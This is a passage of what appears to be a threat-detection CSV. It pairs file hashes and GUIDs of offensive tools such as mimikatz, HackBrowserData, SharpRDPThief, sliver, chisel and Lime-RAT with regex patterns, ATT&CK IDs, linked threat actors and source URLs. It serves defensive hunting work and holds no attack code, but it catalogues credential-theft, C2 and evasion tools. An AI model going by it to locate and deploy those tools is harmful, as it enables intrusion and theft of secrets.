Access","https://github.com/kmahyyg/mremoteng-decrypt","1","0","#filehash","N/A","8","1","83","21","2022-10-29T16:02:26Z","2019-05-11T09:09:49Z","28976" "*7372d0b75d0e1e78951d47c88fdba0bf2f04eedf7b12dde37afb87d2622b6426*",".{0,1000}7372d0b75d0e1e78951d47c88fdba0bf2f04eedf7b12dde37afb87d2622b6426.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28977" "*73746146beb936f2c5fc328293b12683e1e893ba74f7c9f931a0e9fe1ab2d254*",".{0,1000}73746146beb936f2c5fc328293b12683e1e893ba74f7c9f931a0e9fe1ab2d254.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28978" "*737bb1aff3cc22137328d202836fc2bca1f52c2bcae9ad2c786c8fc075a78580*",".{0,1000}737bb1aff3cc22137328d202836fc2bca1f52c2bcae9ad2c786c8fc075a78580.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28980" "*73882b9c273a72eb49fc2854de8b37ef3012115c0e62267acb8b955a681ec312*",".{0,1000}73882b9c273a72eb49fc2854de8b37ef3012115c0e62267acb8b955a681ec312.{0,1000}","offensive_tool_keyword","LostMyPassword","Nirsoft tool that allows you to recover a lost password if it's stored by a software installed on your system","T1040 - T1003 - T1078 - T1518 - T1555","TA0006 - TA0009 ","N/A","LockBit","Credential Access","https://www.nirsoft.net/alpha/lostmypassword-x64.zip","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","28982" "*7388af6f44132b039881b25fbd8bac9caabee85246196f90c8952c4c25bd8f4d*",".{0,1000}7388af6f44132b039881b25fbd8bac9caabee85246196f90c8952c4c25bd8f4d.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","28983" "*738dd06fea4b4b507c0438eac77c8ed3267ed9617b51c565ea05f21529999164*",".{0,1000}738dd06fea4b4b507c0438eac77c8ed3267ed9617b51c565ea05f21529999164.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","28984" 
"*738f3dce5ad63a16b2cf8b236d8d374022f121c0990e92adc214a6d03b0dc345*",".{0,1000}738f3dce5ad63a16b2cf8b236d8d374022f121c0990e92adc214a6d03b0dc345.{0,1000}","offensive_tool_keyword","SafetyDump","in memory process dumper - uses the Minidump Windows API to dump process memory before base64 encoding that dump and writing it to standard output","T1003.005 - T1059.001 - T1105 - T1071.001","TA0005 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/riskydissonance/SafetyDump","1","0","#filehash","N/A","10","2","162","16","2020-10-29T16:25:04Z","2019-12-10T14:45:17Z","28985" "*73939d01fbba0a642ae8ab2df914bdae45187cf0cf131ae2ca5d37c05e8181c8*",".{0,1000}73939d01fbba0a642ae8ab2df914bdae45187cf0cf131ae2ca5d37c05e8181c8.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","28986" "*73948912-CEBD-48ED-85E2-85FCD1D4F560*",".{0,1000}73948912\-CEBD\-48ED\-85E2\-85FCD1D4F560.{0,1000}","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","0","#GUIDproject","N/A","10","5","469","89","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z","28987" "*73a1461ab0925ac9df52dca7f7b3b2c8e46f25e440228c17d2c95c430bf22e68*",".{0,1000}73a1461ab0925ac9df52dca7f7b3b2c8e46f25e440228c17d2c95c430bf22e68.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","28989" 
"*73ae5eca3016d96f296466bba035f6acd33bcb0a3a794338c9beae7eef10196b*",".{0,1000}73ae5eca3016d96f296466bba035f6acd33bcb0a3a794338c9beae7eef10196b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28990" "*73aecc573cd5fa9b83875ab373a7ea718c02c2c2efdb7fcc8d84bda504d28ed9*",".{0,1000}73aecc573cd5fa9b83875ab373a7ea718c02c2c2efdb7fcc8d84bda504d28ed9.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","28991" "*73af2b231655407f21245cfd079ee28ba711ff9cece86a0965673dffc0ebaafe*",".{0,1000}73af2b231655407f21245cfd079ee28ba711ff9cece86a0965673dffc0ebaafe.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28992" "*73b0c526db81c60a58abf4a5b7e6f6eb7959efb0b5b65c16afa105d74342a9ae*",".{0,1000}73b0c526db81c60a58abf4a5b7e6f6eb7959efb0b5b65c16afa105d74342a9ae.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - 
T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","28994" "*73B2C22B-C020-45B7-BF61-B48F49A2693F*",".{0,1000}73B2C22B\-C020\-45B7\-BF61\-B48F49A2693F.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","0","#GUIDproject","N/A","10","2","160","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z","28995" "*73bfe881caa5f9e01efe86acede30ffd1a651d77bd7b884e2601064c18c7a215*",".{0,1000}73bfe881caa5f9e01efe86acede30ffd1a651d77bd7b884e2601064c18c7a215.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","28996" "*73c18fc9053fdaa31ddff70920e31ea2e638d3012eeb795c51923ca1902a6c81*",".{0,1000}73c18fc9053fdaa31ddff70920e31ea2e638d3012eeb795c51923ca1902a6c81.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28997" "*73c49b77b6b2e4032eacfc94d5e5e2bd185fc8ce7eba23ed4ca6921ceb631614*",".{0,1000}73c49b77b6b2e4032eacfc94d5e5e2bd185fc8ce7eba23ed4ca6921ceb631614.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","28998" "*73c6754604666d7e05ed07db7ebc79fa3fe8d85cb049132c1b7b7d33181a70e6*",".{0,1000}73c6754604666d7e05ed07db7ebc79fa3fe8d85cb049132c1b7b7d33181a70e6.{0,1000}","offensive_tool_keyword","LsassReflectDumping","leverages the Process Forking technique using the RtlCreateProcessReflection API to clone the lsass.exe process. Once the clone is created - it utilizes MINIDUMP_CALLBACK_INFORMATION callbacks to generate a memory dump of the cloned process","T1003.001 - T1555.003 - T1077","TA0006","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/LsassReflectDumping","1","0","#filehash","N/A","10","2","198","27","2024-10-19T08:16:13Z","2024-10-17T14:57:30Z","28999" "*73db8fde14d109514c0734b7852e4a4307b5b4cc4cb6aa5aa15f601359e88740*",".{0,1000}73db8fde14d109514c0734b7852e4a4307b5b4cc4cb6aa5aa15f601359e88740.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29002" 
"*73e0810037eaca1b0a643396b61a0b6462582d89d952c0c20f96f800dbf5e2e5*",".{0,1000}73e0810037eaca1b0a643396b61a0b6462582d89d952c0c20f96f800dbf5e2e5.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","29003" "*73ECE052-4218-465D-AA2E-A2D03448BEDD*",".{0,1000}73ECE052\-4218\-465D\-AA2E\-A2D03448BEDD.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","29006" "*73EF1630-1208-43C5-9E3F-19A2923875C5*",".{0,1000}73EF1630\-1208\-43C5\-9E3F\-19A2923875C5.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - 
Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","29007" "*73F11EE8-F565-479E-8366-BD74EE467CE8*",".{0,1000}73F11EE8\-F565\-479E\-8366\-BD74EE467CE8.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","29008" "*73fb2d477ece754ce6ad9239126b69f9dc3dfc95775ef0714a4df26ee7ac4352*",".{0,1000}73fb2d477ece754ce6ad9239126b69f9dc3dfc95775ef0714a4df26ee7ac4352.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","0","#filehash","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","29011" "*73fc266095e6d582b79db226145d0990129ad72c584863a61f3bd0e8056a0435*",".{0,1000}73fc266095e6d582b79db226145d0990129ad72c584863a61f3bd0e8056a0435.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","29012" "*7405ebb59402ba05f601ba5533c31149d406a16e9b0159b7ab347f16c0400ff9*",".{0,1000}7405ebb59402ba05f601ba5533c31149d406a16e9b0159b7ab347f16c0400ff9.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - 
","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","29014" "*740879d5c5c757899862884c89b2d1386ff5b85a68d8d847201080f74201ed36*",".{0,1000}740879d5c5c757899862884c89b2d1386ff5b85a68d8d847201080f74201ed36.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","29015" "*7409b573c0e8e5ab73e6e3fafbe635438fbfd6f2acb57a31c859f43ad623f64f*",".{0,1000}7409b573c0e8e5ab73e6e3fafbe635438fbfd6f2acb57a31c859f43ad623f64f.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","29016" 
"*7409b573c0e8e5ab73e6e3fafbe635438fbfd6f2acb57a31c859f43ad623f64f*",".{0,1000}7409b573c0e8e5ab73e6e3fafbe635438fbfd6f2acb57a31c859f43ad623f64f.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","29017" "*740eeb1510b4ed4b7f45792e1fed2296c31f026ccbd07ac4c081ebf019bed957*",".{0,1000}740eeb1510b4ed4b7f45792e1fed2296c31f026ccbd07ac4c081ebf019bed957.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29019" 
"*7418d1e6a74aea632ed7f6d7310130cea80b8f6e2df0592fa344bae7987d17c9*",".{0,1000}7418d1e6a74aea632ed7f6d7310130cea80b8f6e2df0592fa344bae7987d17c9.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","29021" "*7419174a31b2ec7503765d473943459f5d3d959c0c69fa23da6f6f551e6464ce*",".{0,1000}7419174a31b2ec7503765d473943459f5d3d959c0c69fa23da6f6f551e6464ce.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","29022" "*74200b1f738a038ff90ec70377feb61c978487c71b2a9468d827c188fc33a900*",".{0,1000}74200b1f738a038ff90ec70377feb61c978487c71b2a9468d827c188fc33a900.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29023" "*7423162b1a3b77b3cb5f76173204dd5983b683ae*",".{0,1000}7423162b1a3b77b3cb5f76173204dd5983b683ae.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","29024" "*74320041c8717c6859e9b2c03b5c187b7157bb0c36a0f883192621e3a5f49711*",".{0,1000}74320041c8717c6859e9b2c03b5c187b7157bb0c36a0f883192621e3a5f49711.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29025" "*743311db70cca9995302b8033669c33560debfe7f1ba581a92d3aa02c27856fe*",".{0,1000}743311db70cca9995302b8033669c33560debfe7f1ba581a92d3aa02c27856fe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","29026" "*743772d28582dd1c9e4015074bac13a00232b41d9de7fb8358858825024da9cc*",".{0,1000}743772d28582dd1c9e4015074bac13a00232b41d9de7fb8358858825024da9cc.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","29028" "*7442b80cbef6b940d332c3ee1f640c8b7c61fbd833895da3b58c72f5e802765f*",".{0,1000}7442b80cbef6b940d332c3ee1f640c8b7c61fbd833895da3b58c72f5e802765f.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","29032" "*7443/new/payloads*",".{0,1000}7443\/new\/payloads.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","29033" "*744e50af5566fa5ab70d4db70d35b3b89d75018e00b6b1e8e6280030482353bc*",".{0,1000}744e50af5566fa5ab70d4db70d35b3b89d75018e00b6b1e8e6280030482353bc.{0,1000}","offensive_tool_keyword","chromepass","ChromePass is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry. 
the following information is displayed: Origin URL. Action URL. User Name Field. Password Field. User Name. Password. and Created Time. It allows you to get the passwords from your current running system. or from a user profile stored on external drive.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","GoGoogle - GOBLIN PANDA - Loki","Credential Access","https://www.nirsoft.net/utils/chromepass.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","29036" "*74538a33411912829115fdbd71633c7e250b00fb2c1a936641c3d32c3e77ee8b*",".{0,1000}74538a33411912829115fdbd71633c7e250b00fb2c1a936641c3d32c3e77ee8b.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","29037" "*7454351714f775b8391bc42fb94e929c87850debadc69d48a40ac7d9584e1211*",".{0,1000}7454351714f775b8391bc42fb94e929c87850debadc69d48a40ac7d9584e1211.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","29038" "*745a1708e179bd41883666ac0c5c35c615f1dd2a730ff0c1761beb5fc7ed7248*",".{0,1000}745a1708e179bd41883666ac0c5c35c615f1dd2a730ff0c1761beb5fc7ed7248.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that 
